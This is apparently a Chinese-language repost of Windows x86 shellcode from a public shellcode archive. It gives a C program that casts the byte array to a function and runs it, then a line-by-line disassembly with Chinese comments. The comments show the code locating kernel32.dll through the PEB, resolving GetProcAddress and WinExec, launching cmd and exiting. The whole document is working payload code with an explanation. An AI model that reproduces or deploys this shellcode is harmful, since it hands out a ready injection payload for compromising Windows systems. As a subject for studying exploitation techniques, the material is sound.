转载自
http://shell-storm.org/shellcode/files/shellcode-662.php
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
"\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE"
"\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53"
"\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24"
"\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51"
"\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE"
"\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45"
"\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54"
"\x24\x20\x57\xFF\xD0";
printf("Size = %d\n", strlen(shellcode));
system("PAUSE");
((void (*)())shellcode)();
return 0;
}
对这个shellcode的分析
const char *shellcode =
"\xFC" // cld ; 清空标志
"\x33\xD2" // xor edx, edx
"\xB2\x30" // mov dl, 30h ; FS 寄存器保存了 TEB 结构体
// ; 30h 处是 PEB 结构体
"\x64\xFF\x32" // push dword ptr fs:[edx] ; PEB 地址入栈
"\x5A" // pop edx ; 获取 PEB 地址到 EDX
"\x8B\x52\x0C" // mov edx, dword ptr [edx+0Ch] ; 获取 PEB_LDR_DATA 结构体地址到 EDX
"\x8B\x52\x14" // mov edx, dword ptr [edx+14h] ; 获取 InMemoryOrderModuleList 中的第一项 ENTRY 地址到 EDX
"\x8B\x72\x28" // mov esi, dword ptr [edx+28h] ; 获取 第一个 ENTRY 的 FullDllName 的地址到 ESI
"\x33\xC9" // xor ecx, ecx
"\xB1\x18" // mov cl, 18h
"\x33\xFF" // xor edi, edi
"\x33\xC0" // xor eax, eax
"\xAC" // lods byte ptr [esi]
"\x3C\x61" // cmp al, 61h
"\x7C\x02" // jl +2h
"\x2C\x20" // sub al, 20h
"\xC1\xCF\x0D" // ror edi, 0Dh
"\x03\xF8" // add edi, eax
"\xE2\xF0" // loop -10h
"\x81\xFF\x5B\xBC\x4A\x6A" // cmp edi, 6A4ABC5Bh
"\x8B\x5A\x10" // mov ebx, dword ptr [edx+10h]
"\x8B\x12" // mov edx, dword ptr [edx]
"\x75\xDA" // jne -26h ; 找到 KERNEL32.DLL 所在的 ENTRY
"\x8B\x53\x3C" // mov edx, dword ptr [ebx+3Ch]
"\x03\xD3" // add edx, ebx
"\xFF\x72\x34" // push dword ptr [edx+34h]
"\x8B\x52\x78" // mov edx, dword ptr [edx+78h]
"\x03\xD3" // add edx, ebx
"\x8B\x72\x20" // mov esi, dword ptr [edx+20h]
"\x03\xF3" // add esi, ebx
"\x33\xC9" // xor ecx, ecx
"\x41" // inc ecx
"\xAD" // lods dword ptr [esi]
"\x03\xC3" // add eax, ebx
"\x81\x38\x47\x65\x74\x50" // cmp dword ptr [eax], 50746547h
"\x75\xF4" // jne -0ch
"\x81\x78\x04\x72\x6F\x63\x41" // cmp dword ptr [eax+4], 41636F72h
"\x75\xEB" // jne -15h
"\x81\x78\x08\x64\x64\x72\x65" // cmp dword ptr [eax+8], 65726464h ; 获得 "GetProcAddress" 函数的地址
"\x75\xE2" // jne -1eh
"\x49" // dec ecx
"\x8B\x72\x24" // mov esi, dword ptr [edx+24h]
"\x03\xF3" // add esi, ebx
"\x66\x8B\x0C\x4E" // mov cx, word ptr [esi+ecx*2]
"\x8B\x72\x1C" // mov esi, dword ptr [edx+1Ch]
"\x03\xF3" // add esi, ebx
"\x8B\x14\x8E" // mov edx, dword ptr [esi+ecx*4]
"\x03\xD3" // add edx, ebx
"\x52" // push edx
"\x68\x78\x65\x63\x01" // push 01636578h
"\xFE\x4C\x24\x03" // dec byte ptr [esp+3]
"\x68\x57\x69\x6E\x45" // push 456E6957h
"\x54" // push esp
"\x53" // push ebx
"\xFF\xD2" // call edx
"\x68\x63\x6D\x64\x01" // push 01646D63h
"\xFE\x4C\x24\x03" // dec byte ptr [esp+3]
"\x6A\x05" // push 5
"\x33\xC9" // xor ecx, ecx
"\x8D\x4C\x24\x04" // lea ecx, [esp+4] ; 获得 "WinExec" 函数的地址
"\x51" // push ecx
"\xFF\xD0" // call eax
"\x68\x65\x73\x73\x01" // push 01737365h
"\x8B\xDF" // mov ebx, edi
"\xFE\x4C\x24\x03" // dec byte ptr [esp+3]
"\x68\x50\x72\x6F\x63" // push 636F7250h
"\x68\x45\x78\x69\x74" // push 74697845h
"\x54" // push esp
"\xFF\x74\x24\x20" // push dword ptr [esp+20h]
"\xFF\x54\x24\x20" // call dword ptr [esp+20h] ; 执行 WinExec("cmd")
"\x57" // push edi
"\xFF\xD0" // call eax ; 执行 ExitProcess
;
